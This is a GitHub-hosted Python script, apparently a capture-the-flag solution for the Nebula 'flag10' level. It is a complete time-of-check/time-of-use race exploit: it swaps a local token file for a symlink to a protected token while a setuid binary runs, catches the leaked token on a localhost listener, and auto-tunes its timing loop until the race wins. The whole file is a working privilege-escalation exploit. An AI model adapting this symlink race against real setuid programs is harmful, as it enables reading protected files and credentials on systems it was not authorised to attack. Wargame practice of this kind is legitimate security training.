-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
executable file
·89 lines (72 loc) · 2.27 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/env python
import os, subprocess, socket, time
from multiprocessing import Process, Queue
def create_local_token():
os.system("rm token")
os.system("touch token")
def link_target_token():
os.system("rm token")
os.system("ln -s ../flag10/token token")
def call_flag10(queue):
p = subprocess.Popen(["../flag10/flag10", "./token", "127.0.0.1"], stdout=subprocess.PIPE)
out, _ = p.communicate()
queue.put(out)
def listener(queue):
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(("127.0.0.1", 18211))
serversocket.listen(5)
found = False
while not found:
clientsocket, _ = serversocket.accept()
time.sleep(1) # wait a second to make the timewindow between access and read bigger in flag10
token = clientsocket.recv(64)
if len(token) > 10:
queue.put(token)
clientsocket.close()
serversocket.shutdown(socket.SHUT_RDWR)
serversocket.close()
found = True
clientsocket.close()
c = 200000 # startvalue for wait loop
step = 100 # startvalue for inc/dec of wait loop value
last = "P" # last action: P Permission denied > too fast > inc loop value
# C Connected > local token was send > too slow > dec loop value
flag10_queue = Queue()
listener_queue = Queue()
# Start listener on port 18211
socket_process = Process(target=listener, args=(listener_queue,))
socket_process.start()
found = False
while not found: # main loop
create_local_token()
# call flag10 in subprocess
flag10_process = Process(target=call_flag10, args=(flag10_queue,))
flag10_process.start()
# wait loop to wait for access to check token permission
for x in range(1, c):
pass
# exchange local token with link to target token
link_target_token()
# join subprocess flag10 to get result
flag10_process.join()
result = flag10_queue.get()
if not listener_queue.empty():
socket_process.join()
token = listener_queue.get()
print(token)
found = True
else:
# tune wait loop
if str(result).startswith('Connecting'):
# sent local token; waited too long
c = c - step
if last == "P" and step > 1:
last = "C"
step = step - 1
else:
# flag10 accessed target token, not local token; waited not long enough
c = c + step
if last == "C" and step > 1:
last = "P"
step = step - 1
print("."),